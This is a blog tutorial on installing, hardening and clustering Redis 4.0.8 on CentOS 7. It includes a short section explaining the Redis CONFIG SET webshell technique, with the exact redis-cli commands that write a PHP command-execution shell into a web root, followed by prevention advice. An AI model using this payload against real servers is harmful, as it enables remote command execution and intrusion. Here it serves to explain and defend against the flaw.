CentOS7.X installs Redis-4.0.8 and builds Redis clusters

Posted by chrisv on Tue, 17 Mar 2020 12:24:00 +0100

My personal website

Install redis

  1. Preparation before installation

    yum install \
    vim \
    wget \
    make \
    gcc \
    gcc-c++ \
    automake \
    autoconf \
    -y \
  2. Download, unzip and install

    cd /root
    wget http://download.redis.io/releases/redis-4.0.8.tar.gz
    tar -zxzf redis-4.0.8.tar.gz
    cd redis-4.0.8
    make PREFIX=/usr/local/redis/ install
  3. Create the data file storage location required in the configuration

    mkdir /data
    mkdir /data/redis
    mkdir /usr/local/redis/log
  4. Add modify profile Reference configuration

    cp ./redis.conf /usr/local/redis
    vim /usr/local/redis/redis.conf
    # IP binding
    # Protection mode (the opening condition is that redis can communicate with each other and cluster cannot be opened)
    protected-mode yes
    # Access port
    port 6379
    # Connection timeout, unit S, 0 is disable timeout
    timeout 0
    # Run as Daemons
    daemonize yes
    # Data file path
    dir /data/redis
    # Path to process ID file
    pidfile /usr/local/redis/log/redis.pid
    # log file path
    logfile /usr/local/redis/log/redis.log
    # Open key expiration delete notification
    notify-keyspace-events Ex
    # The following security configuration options are for reference only
        # Disable some dangerous orders
        rename-command FLUSHALL ""
        rename-command CONFIG   ""
        rename-command EVAL     ""
        # Add access password
        requirepass ********
        # IP binding native
  5. performance optimization

    # Edit / etc/rc.local
    vim /etc/rc.local
    echo never > /sys/kernel/mm/transparent_hugepage/enabled
    # Add / etc/rc.local execution permission
    chmod +x /etc/rc.d/rc.local
    # Edit / etc/sysctl.conf
    vim /etc/sysctl.conf
    vm.overcommit_memory = 1
    net.core.somaxconn = 1024
    # Immediate solution
    echo never > /sys/kernel/mm/transparent_hugepage/enabled
    echo 1024 > /proc/sys/net/core/somaxconn
    sysctl vm.overcommit_memory=1
    sysctl -p
  6. Modify directory ownership

    useradd -s /sbin/nologin -M redis
    chown -R redis:redis /data/redis
    chown -R redis:redis /usr/local/redis
  7. Start redis and set power on

    # Enter the unit file directory
    cd /etc/systemd/system
    # Create a redis cell file in the format of [cell file name]. [cell file type]
    vim redis.service
    Description=Start redis on boot.
    After=default.target network.target
    ExecStart=/usr/local/redis/bin/redis-server /usr/local/redis/redis.conf
    ExecReload=/bin/kill -s HUP $MAINPID
    ExecStop=/bin/kill -s QUIT $MAINPID
    # Modify the file permission so that only root can edit the file
    chown -R root:root /etc/systemd/system/redis.service
    chmod -R 644 /etc/systemd/system/redis.service
    # Update systemd
    systemctl daemon-reload
    systemctl enable redis
    systemctl start redis
  8. Store data

    /usr/local/redis/bin/redis-cli -h
    set num 123
    get num
  9. Batch delete matching rule data

    Redis cli keys [matching rule] | xargs redis cli del

Redis downtime aof file corruption start failed

  1. Copy aof file
  2. Repair damaged aof files

    Redis check AOF -- fix [AOF filename]
  3. Restart Redis

The exploitation of Redis vulnerability webshell

Reference link

  1. Redis uses the following principles for this vulnerability

    1. Redis native supports' redis cli > config set 'without restarting the redis service
      Next, modify the configuration of dir and dbfilename dynamically;
    2. If 'dir /www /' and 'dbfilename test.php' are specified in the redis configuration, the
      When the save command is executed, a datastore file test.php will be generated in the directory / www /

    File is a binary file, but its content contains the value of the saved data, if / www / directory is web
    Directory, then / www/test.php will be used as the entry to your server;

  2. Examples of loopholes (this is a negative textbook)

    1. redis runs as root
    2. Nginx starts as root, and the subprocesses run as root
    3. The web server is nginx and configured as follows:

      server {
          listen       x;
          server_name  xxx.xxx.com;
          root         /www;
          location / {
              index    index.php index.html index.htm;
          location ~ \.php$ {
              fastcgi_index  index.php;
              fastcgi_param  SCRIPT_NAME      $fastcgi_script_name;
              fastcgi_param  SCRIPT_FILENAME  $document_root$fastcgi_script_name;
              include        fastcgi_params;
    4. The following command is executed through redis cli

      config set dir /www/
      config set dbfilename test.php
      set test "<?php exec($_GET['cmd']); ?>"
    5. And then something terrible happened

      1. Under the / www / directory, there is the test.php file, which can be accessed through the http://xxx.xxx.com/test.php Visit to
      2. If you visit now http://xxx.xxx.com/test.php?cmd=xxx, Then xxx will be executed as root (xxx is any linux command)

Prevention of Redis vulnerability webshell

  1. Do not use redis's web management tools online
  2. redis runs as a low privilege user (unexpected user name such as rediser)
  3. redis can only be accessed through the local and intranet (bind
  4. redis disable config command (rename command config can be disabled in the configuration file)
  5. The web service subprocess runs as a low privileged user (because the user running webshell is a subprocess of the web service)

redis cluster

  1. Configuration before cluster (single machine two service test 63796380)

    #Intranet IP:
  2. Modify redis.conf

    vim /usr/local/redis/redis.conf
    # Enable cluster
    cluster-enabled yes
    # Call cluster profile
    cluster-config-file nodes-6379.conf
    # Cluster timeout
    cluster-node-timeout 15000
    # Shut down all downtime
    cluster-require-full-coverage no
    # Number of cluster subordinate elements
    cluster-slave-validity-factor 10
    # Minimum migration value of slave number (master must have at least two slaves before slave migration)
    cluster-migration-barrier 1
  3. Profile add

    yum install ruby
    gem install redis
    cp /usr/local/redis/redis.conf /usr/local/redis/redis.conf.backup
    cp /usr/local/redis/redis.conf /usr/local/redis/redis-6379.conf
    cp /usr/local/redis/redis.conf /usr/local/redis/redis-6380.conf
    mkdir /usr/local/redis/data/6379
    mkdir /usr/local/redis/data/6380
  4. Modify redis-6379.conf

    vim /usr/local/redis/redis-6379.conf
    unixsocket /usr/local/redis/data/6379/redis.sock
    pidfile /usr/local/redis/log/redis_6379.pid
    logfile /usr/local/redis/log/redis_6379.log
    dir /usr/local/redis/data/6379/
    port 6379
  5. Modify redis-6380.conf

    vim /usr/local/redis/redis-6380.conf
    unixsocket /usr/local/redis/data/6380/redis.sock
    pidfile /usr/local/redis/log/redis_6380.pid
    logfile "/usr/local/redis/log/redis_6380.log"
    dir /usr/local/redis/data/6380/
    port 6380
  6. Modify startup

    vim /etc/rc.local
    /usr/local/redis/bin/redis-server /usr/local/redis/redis-6379.conf
    /usr/local/redis/bin/redis-server /usr/local/redis/redis-6380.conf
  7. Create cluster

    cd /root/redis/src/
    # view help
    ./redis-trib.rb help
    # Add bindings
    ./redis-trib.rb create --replicas 1
  8. Cluster testing

    /usr/local/redis/bin/redis-cli -h -p 6379 -c
  9. Normal shutdown (do not force shutdown)

    /usr/local/redis/bin/redis-cli -h -p 6379 shutdown
  10. Alipay red envelopes support authors

Topics: Operation & Maintenance Redis PHP vim yum